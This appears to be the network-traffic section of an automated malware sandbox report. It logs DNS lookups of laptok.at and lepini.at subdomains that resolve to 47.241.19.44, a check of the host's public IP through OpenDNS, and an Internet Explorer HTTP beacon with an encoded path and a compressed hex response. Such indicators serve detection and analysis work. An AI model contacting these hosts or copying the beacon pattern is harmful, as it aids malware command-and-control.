                                                                                                                                                    Nov 24, 2020 20:36:34.614296913 CET804977247.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:35.467319012 CET804977247.241.19.44192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:35.467648983 CET4977280192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:36:35.468257904 CET4977280192.168.2.447.241.19.44
                                                                                                                                                    Nov 24, 2020 20:36:35.732811928 CET804977247.241.19.44192.168.2.4

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 24, 2020 20:34:13.533107042 CET4971453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:13.560318947 CET53497148.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:23.378046989 CET5802853192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:23.413829088 CET53580288.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:24.982620955 CET5309753192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:25.009572029 CET53530978.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:28.018004894 CET4925753192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:28.045131922 CET53492578.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:29.904697895 CET6238953192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:29.931906939 CET53623898.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:30.945687056 CET4991053192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:30.972739935 CET53499108.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:31.956492901 CET5585453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:31.983611107 CET53558548.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:32.099657059 CET6454953192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:32.126741886 CET53645498.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:32.999923944 CET6315353192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:33.027041912 CET53631538.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:34.012279034 CET5299153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:34.039252043 CET53529918.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:34.992656946 CET5370053192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:35.019730091 CET53537008.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:36.013046026 CET5172653192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:36.069915056 CET53517268.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:37.123130083 CET5679453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:37.159025908 CET53567948.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:38.135881901 CET5653453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:38.171236038 CET53565348.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:39.773144960 CET5662753192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:39.808950901 CET53566278.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:41.167246103 CET5662153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:41.202810049 CET53566218.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:48.704874992 CET6311653192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:48.731828928 CET53631168.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:49.810161114 CET6407853192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:49.837342978 CET53640788.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:51.155292988 CET6480153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:51.182472944 CET53648018.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:52.588660955 CET6172153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:52.615896940 CET53617218.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:53.925753117 CET5125553192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:53.961416960 CET53512558.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:54.032825947 CET6152253192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:54.095695019 CET53615228.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:54.376102924 CET5233753192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:54.411653996 CET53523378.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:54.875458956 CET5504653192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:54.913110018 CET53550468.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:54.984100103 CET4961253192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:55.027966022 CET53496128.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:55.223490953 CET4928553192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:55.259056091 CET53492858.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:55.621079922 CET5060153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:55.661634922 CET53506018.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:56.023658037 CET6087553192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:56.050753117 CET53608758.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:56.078949928 CET5644853192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:56.114445925 CET53564488.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:56.586137056 CET5917253192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:56.621627092 CET53591728.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:57.185034037 CET6242053192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:57.212193966 CET53624208.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:58.193654060 CET6057953192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:58.229302883 CET53605798.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:34:58.617978096 CET5018353192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:34:58.656008959 CET53501838.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:09.762855053 CET6153153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:09.789949894 CET53615318.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:10.759701967 CET6153153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:10.786729097 CET53615318.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:11.409133911 CET4922853192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:11.445939064 CET53492288.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:11.776591063 CET6153153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:11.811992884 CET53615318.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:13.791517019 CET6153153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:13.818541050 CET53615318.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:17.807395935 CET6153153192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:17.834475040 CET53615318.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:24.219224930 CET5979453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:24.246233940 CET53597948.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:26.075368881 CET5591653192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:26.112325907 CET53559168.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:26.972171068 CET5275253192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:27.306971073 CET53527528.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:32.034512043 CET6054253192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:32.070224047 CET53605428.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:41.276520967 CET6068953192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:41.303740025 CET53606898.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:35:44.833215952 CET6420653192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:35:44.868624926 CET53642068.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:23.735505104 CET5090453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:36:23.771503925 CET53509048.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:31.473738909 CET5752553192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:36:31.500720024 CET53575258.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:31.507250071 CET5752653192.168.2.4208.67.222.222
                                                                                                                                                    Nov 24, 2020 20:36:31.523708105 CET5357526208.67.222.222192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:31.526408911 CET5752753192.168.2.4208.67.222.222
                                                                                                                                                    Nov 24, 2020 20:36:31.542952061 CET5357527208.67.222.222192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:31.565710068 CET5752853192.168.2.4208.67.222.222
                                                                                                                                                    Nov 24, 2020 20:36:31.582151890 CET5357528208.67.222.222192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:32.435195923 CET5381453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:36:32.472851038 CET53538148.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:36:34.044433117 CET5341853192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:36:34.080185890 CET53534188.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:38:53.140791893 CET6283353192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:38:53.176465034 CET53628338.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:38:53.963383913 CET5926053192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:38:54.003950119 CET53592608.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:38:54.632116079 CET4994453192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:38:54.669934034 CET53499448.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:38:55.021239042 CET6330053192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:38:55.056843996 CET53633008.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:38:55.203542948 CET6144953192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:38:55.230699062 CET53614498.8.8.8192.168.2.4
                                                                                                                                                    Nov 24, 2020 20:39:13.103482008 CET5127553192.168.2.48.8.8.8
                                                                                                                                                    Nov 24, 2020 20:39:13.130712986 CET53512758.8.8.8192.168.2.4

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Nov 24, 2020 20:34:41.167246103 CET192.168.2.48.8.8.80x316cStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:35:26.972171068 CET192.168.2.48.8.8.80x54aaStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:35:32.034512043 CET192.168.2.48.8.8.80x72baStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:23.735505104 CET192.168.2.48.8.8.80x4693Standard query (0)c56.lepini.atA (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.473738909 CET192.168.2.48.8.8.80x17eaStandard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.507250071 CET192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.526408911 CET192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.565710068 CET192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:32.435195923 CET192.168.2.48.8.8.80x1dd2Standard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:34.044433117 CET192.168.2.48.8.8.80x124fStandard query (0)api3.lepini.atA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Nov 24, 2020 20:34:41.202810049 CET8.8.8.8192.168.2.40x316cNo error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:35:27.306971073 CET8.8.8.8192.168.2.40x54aaNo error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:35:32.070224047 CET8.8.8.8192.168.2.40x72baNo error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:23.771503925 CET8.8.8.8192.168.2.40x4693No error (0)c56.lepini.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.500720024 CET8.8.8.8192.168.2.40x17eaNo error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.523708105 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.542952061 CET208.67.222.222192.168.2.40x2No error (0)myip.opendns.com84.17.52.25A (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:31.582151890 CET208.67.222.222192.168.2.40x3Name error (3)myip.opendns.comnonenone28IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:32.472851038 CET8.8.8.8192.168.2.40x1dd2No error (0)api3.lepini.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                                    Nov 24, 2020 20:36:34.080185890 CET8.8.8.8192.168.2.40x124fNo error (0)api3.lepini.at47.241.19.44A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • api10.laptok.at
                                                                                                                                                    • c56.lepini.at
                                                                                                                                                    • api3.lepini.at

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.44974047.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:34:41.512365103 CET758OUTGET /api1/wRVY2NGdrRF/A_2Fha_2BTMf9b/Bkb0axFyVYg6CTiYCB0u_/2BNYoZUqIeFy6mXY/RsCAvo5yVPYtDbs/KEFb4oNdgILibF2Swr/I2w7rEJuT/Pp84EV24JCnppdQDLtg7/0g_2BJz5R_2FkQu9e_2/FGSaB0rJRCWjGvLRGTnGVc/Iu0pUH4kxZUPO/79c_2Bxp/zIxSbOn31EVZ_2FT_2BE4Ox/zrp24711fz/qBCMvOouQ_2B_2FBw/tevTXGEDmXVA/Fo3RVdsoq0v/QtV4LsUKm4P4d7/Q_0A_0Dq_2BFdmy3Ge3KN/bxiA2odSfTOC3fY6/QHvvQODRC/J_2BkRbDk_2F/bf HTTP/1.1
                                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 24, 2020 20:34:42.636598110 CET759INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:34:42 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 6e ec 40 10 45 3f c8 0b 33 2d cd cc ec 9d 71 cc cc 5f ff f2 a4 28 8a 94 4c c6 ee ae aa 7b 8e a7 73 8e 1f 25 9c 00 53 49 e5 26 0d 27 5f 16 a3 50 98 10 60 e6 36 9e 39 15 17 5d 05 6b 9d 70 5f 59 26 3e 2a 8a 9e ba b2 f1 6f 1f 14 7a 72 d4 f6 71 67 86 8d aa 37 b1 1a c0 b9 c6 3c f7 e7 df 9c d3 c5 0a a2 d9 2b 76 b5 f0 db a8 76 0d ad 2e db ba ca 83 d1 5f d6 a7 de c0 e2 7d e2 cf 8f 7b 0e 40 a1 15 12 ce cf 9a cb 89 4b 9b e1 ca 6c fa 31 58 ac 4e f9 e8 7e 8c c1 7e fc 98 7e 57 8b c3 b4 a8 2f 45 a9 9b aa 2f b1 46 c9 c6 e4 56 b5 30 ee cd a8 9f f9 a0 c3 3a 34 ed 8e fd 0e d5 7e 78 7b d1 aa 1e a6 19 d3 c4 4f d0 01 76 df 2a e6 74 d5 d1 ad d6 94 38 c5 b5 a2 6d 8c 99 c3 35 2b e4 cd 3a c0 7e 76 e7 2d 08 c4 e3 ac 58 ff 5d b4 12 72 a2 b3 00 0a 7d 9c 26 b5 52 2b d9 28 2a 21 2e 6c 61 5e e7 e1 a0 5a 4c 50 04 2a 3b 8d 76 2d 71 cf 6e d5 62 58 85 08 89 c9 71 71 b4 5f 80 b7 e8 01 25 b1 8c 61 e8 d7 e0 d9 2d e7 3d 2a 94 ac 7a 9c c3 74 98 1a 1f 06 99 2c a2 de 51 e4 32 85 50 db d9 80 0e cc 22 c8 84 25 8e 2f a7 9e 95 61 3d 3f 1a a0 ec 44 9c ab 95 fe 70 db 4f 60 73 d0 89 32 9d f0 42 4a 66 17 be 70 04 7b 2b 12 de fa a6 8e 1f 29 c6 37 87 4f a3 88 4b 62 b4 87 ad e5 bf 1b 34 6f 62 55 32 65 ba 37 d5 01 37 4b 11 b6 54 e2 7b ff 78 35 69 bb 98 3e 93 d7 1f 49 68 0d cb b4 0e ca 9a 13 20 c3 53 80 90 3c b4 58 a0 c6 e0 94 ea 01 30 64 70 9a 95 a0 b0 18 3d 34 c7 c8 85 9c 6d fc 74 e5 ee d4 43 91 bf 76 15 d8 62 4e 6e f1 de 42 fd 88 58 3d b3 8c c6 87 e3 97 58 5a 2e 3d 59 99 3a b4 52 8b 66 b8 79 c2 fd b8 6b d2 b3 69 31 49 27 22 1c 4b b4 70 b0 b6 83 75 a2 ab 56 0c 7e f0 50 0d 5f 67 e2 f6 70 5e 42 14 22 32 01 dd 2b 44 a8 93 3a 50 78 29 46 3c 5b 17 7e 77 81 bb 47 a1 64 12 7e fe a1 c0 77 56 21 48 fc f5 c8 2d b8 d3 9c 4b 57 a0 ab 0d 0f 8b 66 fe 0e 3f 9f 7b 65 3a e0 3c 84 5b 41 33 f8 04 c6 95 3d 2b e5 a6 84 25 ef f9 e5 cb 41 54 98 dc 90 d9 fe 96 d5 10 41 4d 8d f1 bb 55 f1 75 a6 1f e7 3c 56 e3 06 fc 04 e5 d8 f4 6c b1 fb 21 dd cf f1 8e 99 79 78 ac f5 97 b9 03 2d 8c d9 76 0c bd 6b 74 5e 91 30 04 73 a4 1e 5b 78 bf 8f 67 9e 5f 7a bc fe 86 f6 8e a3 ee c5 85 ad 3f af 6b 42 3e a2 fa c8 22 88 67 a4 4e 10 95 49 cf 03 f5 b8 41 d9 ed 75 dd ea 98 05 3d 2d aa 43 8b be d0 f5 63 a6 aa fc 96 cf ba 60 02 fb 8a 92 16 72 cb e0 cc 2b 7d 33 02 bb 66 0b 54 2a 60 4c cd c3 9a a0 cd ea 94 92 79 76 71 51 ea 42 30 30 d5 31 3e 87 78 c1 45 26 75 04 32 d9 17 14 f6 26 08 e3 a5 e1 3e f9 c1 71 43 04 c3 a5 a5 79 3b 75 76 75 a4 29 f7 cc 98 be d1 c4 3b a1 6d 9b 88 9f 38 d3 96 d6 78 75 06 60 1f 86 57 3d 21 64 6c c0 e6 c0 da c3 1e c5 a1 c6 a9 74 bb d3 02 48 e5 bc 88 b8 98 09 5a 3b 80 59 83 8b 32 24 72 b7 21 d6 49 e2 0c 35 75 8e 2a 15 0f 8d 65 92 f6 8d 57 2c 46 98 42 6e 78 69 62 23 86 8a ee eb 25 a3 13 89 e7 f8 36 a3 65 ae 25 25 68 97 ce ec 5f f5 e0 a7 95 89 68 73 b8 a2 0c 68 26 e2 f3 33 a2 7d 45 04 97 d7 48 6c 1b 4b 0d b9 89 2f 83 78 11 6d 47 c4 27 46 bd f6 ef 3a 1d 79 bf 46 6b 7c fa 7e 57 84 53 f9 05 90 77 2f 10 66 c8 e8 22 35 69 b8 e3 b2 9e 49 58 81 dd e1 9d aa 6b 39 bf 63 e5 d0 7b 42 fb db e2 49 97 47 8e b6 d8 cb b7 a2 f9 e8 4a 18 75 2c 03 70 25 8b f7 bb 2a cc 91 79 7d 3e 63 87 97 12 ab 78 ba
                                                                                                                                                    Data Ascii: 2000n@E?3-q_(L{s%SI&'_P`69]kp_Y&>*ozrqg7<+vv._}{@Kl1XN~~~W/E/FV0:4~x{Ov*t8m5+:~v-X]r}&R+(*!.la^ZLP*;v-qnbXqq_%a-=*zt,Q2P"%/a=?DpO`s2BJfp{+)7OKb4obU2e77KT{x5i>Ih S<X0dp=4mtCvbNnBX=XZ.=Y:Rfyki1I'"KpuV~P_gp^B"2+D:Px)F<[~wGd~wV!H-KWf?{e:<[A3=+%ATAMUu<Vl!yx-vkt^0s[xg_z?kB>"gNIAu=-Cc`r+}3fT*`LyvqQB001>xE&u2&>qCy;uvu);m8xu`W=!dltHZ;Y2$r!I5u*eW,FBnxib#%6e%%h_hsh&3}EHlK/xmG'F:yFk|~WSw/f"5iIXk9c{BIGJu,p%*y}>cx
                                                                                                                                                    Nov 24, 2020 20:34:42.636662960 CET761INData Raw: eb e8 9f e6 74 d9 30 07 a9 f0 22 1f c2 a0 e4 ea 87 63 cf 04 d2 5d 60 f0 ad 9a 96 ea 60 d7 79 3d 5d 90 e3 8b d5 15 17 f5 12 bf b2 82 3b 53 05 3e cb c3 36 4a c3 5c 19 fe 12 d4 a3 c7 fc 4c 3b 21 15 64 74 15 bf 4d c1 39 3a 52 06 21 cb 79 50 e4 a6 54
                                                                                                                                                    Data Ascii: t0"c]``y=];S>6J\L;!dtM9:R!yPT{Wl13ZFx|&`J6H2ib/xY~ZAx>={92O-FY(b0/VD-,<C/:#k@$t$HRp
                                                                                                                                                    Nov 24, 2020 20:34:42.636694908 CET762INData Raw: a8 d0 a4 5e 5f 68 ca 6f c6 76 bf b4 dd da d2 e8 57 c7 e8 ce 95 7a c6 ad 82 89 d1 3c a2 5d 40 87 64 70 a7 d0 a8 59 48 0f 9f 4b ef f3 f5 25 ae 73 9e 18 65 48 5e 5b cc 89 5f 44 61 e2 74 48 7f 77 ef 52 f5 4a f5 1b 73 6a 94 4e b5 f6 ce bd 49 62 27 45
                                                                                                                                                    Data Ascii: ^_hovWz<]@dpYHK%seH^[_DatHwRJsjNIb'Em8n~\^1KWN}t=`YG8X!zZ;w]8ogMHa({4``fr`Fn"Q+]bgJs\8
                                                                                                                                                    Nov 24, 2020 20:34:42.636724949 CET763INData Raw: 9a 44 3c f4 c8 ff a0 58 71 a4 86 1a 84 6d 90 68 5e 14 f9 d9 e2 b4 9f 5d 53 f9 c5 be a5 94 f6 b3 86 f2 cb d1 b7 f9 e5 25 ed f8 d6 e3 3c 90 9b ea fa bc 39 2b e0 6e ec fe cc 34 67 98 fe fc f2 2c ff c8 f0 c5 a8 db 61 a4 c2 f6 8d 3f 58 22 4a 4e 83 04
                                                                                                                                                    Data Ascii: D<Xqmh^]S%<9+n4g,a?X"JN58q=-on}<Ek*nUS.e}&zKE1i(P]_f&XWShvYHavGqCv{Ghd"%T7D?\\c=jIPD5Y7[
                                                                                                                                                    Nov 24, 2020 20:34:42.636758089 CET765INData Raw: e2 1d 44 59 23 15 ee 27 a0 77 bb 99 d6 62 be 10 26 fd 2e ff 87 5d e0 cf 09 63 c5 fa 15 38 2c 9a 2b e4 77 4c 4a ae cd 9f 7e ab 1b d9 fa f1 6e 41 3f aa cb 9b 4f 35 ed 6b 60 7c 10 e0 46 9a 94 87 85 cf c2 5d fe 5b 2d c2 a9 ec 35 f7 6e e3 a0 a7 1b be
                                                                                                                                                    Data Ascii: DY#'wb&.]c8,+wLJ~nA?O5k`|F][-5nkmb>;snnzF:?~o6V8bu/=?!W*KkgFhDyzj[fz?r6Vg!Wp_kj?<<wOSD"s&U
                                                                                                                                                    Nov 24, 2020 20:34:42.636789083 CET766INData Raw: bf 7f 2a a0 14 61 30 e4 1d 05 12 27 be 1e 59 07 df d1 fe f8 1d 39 a4 03 0a 90 9d 8f f3 3f ff 47 50 af 36 ef 5c de 42 27 c4 04 a5 b3 7f a0 9c c5 0e a3 7c e4 a4 15 1c d2 e5 8a 68 cd 5a 88 5c f7 9f ed 2b 50 97 5f 07 0a 9b ef 7c 95 de de bc 7d 03 d3
                                                                                                                                                    Data Ascii: *a0'Y9?GP6\B'|hZ\+P_|}v@pcb:lQ b2Y=+d-!{Me}<pwZ JY%|I9Ua&3a17/!s$S)%OyS1!4>2amafu?
                                                                                                                                                    Nov 24, 2020 20:34:42.675457954 CET768INData Raw: 32 99 c8 a9 79 80 13 4e 13 20 e5 f3 ad 94 85 fb 44 80 00 d5 6d b1 be 24 ae 51 8f d3 e7 da a6 50 6a 15 62 62 d0 8f c6 bf 5b f8 fb 0b 10 de 2b 50 6a 24 e4 f4 ca da c9 38 45 e6 e9 ff 89 7f 30 47 a6 75 4f dc 81 2a 0b 0e 5e fc 07 09 82 c4 a4 43 90 e9
                                                                                                                                                    Data Ascii: 2yN Dm$QPjbb[+Pj$8E0GuO*^C;\=.>]j`;AhED8/XGl^=2?t!,aXgg=Jpi;Vye<m+p+a"TH{{_t-&
                                                                                                                                                    Nov 24, 2020 20:34:42.675483942 CET769INData Raw: 41 5e 99 f9 37 46 42 38 29 84 50 91 80 b7 0f fe 50 2b bc d0 17 5e 2f 75 62 a5 21 e1 54 3c 6f fe 02 0b e4 a3 26 5c d7 65 83 5c a8 d2 32 2c 03 4c 80 a5 10 5a df 0c e7 ad f2 6e 76 fe 32 a5 48 37 63 e1 32 cc 91 63 ec d4 1e 5d 23 92 13 64 90 1b 9c b5
                                                                                                                                                    Data Ascii: A^7FB8)PP+^/ub!T<o&\e\2,LZnv2H7c2c]#dhI|fXN`YQPW|eI!o}^@6|eeuW7P;"2@r5JsI^.d#lq"ifo^'CJ^l=wd4dtxOQ]i
                                                                                                                                                    Nov 24, 2020 20:34:42.675501108 CET770INData Raw: f4 93 56 1c d2 f0 e7 88 9f e0 6c 8d a3 a8 96 6b 1a 1c 02 9e 95 3e b5 05 56 c3 4b a3 bb c1 84 84 7a 8c 4d 7b ed 11 f6 48 ba ef 75 d4 e4 7b fc 86 02 e2 08 13 20 16 9e e9 e0 11 cd 65 88 5c 07 4d 31 78 64 1f e9 c9 ec 1d 28 1b ea 43 d5 da 45 22 8d 40
                                                                                                                                                    Data Ascii: Vlk>VKzM{Hu{ e\M1xd(CE"@"{g*6ibp*%m;S/:k!3K9O?[~q|l ]L)/;~[R`NMFgy#Z6Ay&.&cZyC+zsON^wCGw5
                                                                                                                                                    Nov 24, 2020 20:34:42.675515890 CET772INData Raw: 58 a2 25 c3 1f 98 85 8d 27 03 ba b6 20 f8 eb f4 64 91 2b 1f fc 14 c3 44 9e b4 7c c6 92 97 78 d1 8f 60 fb ac fe a2 a1 59 85 b5 12 ff 3f 68 29 b9 f5 83 65 d7 e3 c9 77 32 25 0d af 3c d6 a8 d2 09 85 7e 19 a2 48 06 c1 a7 02 f0 7d 85 df af eb c5 32 d0
                                                                                                                                                    Data Ascii: X%' d+D|x`Y?h)ew2%<~H}2t![1 Z%i}M[;rU>CswJ4\YSQbu],o&:SxpNB'G;M8T|b]Pc?E$P2fpRK^i!9b
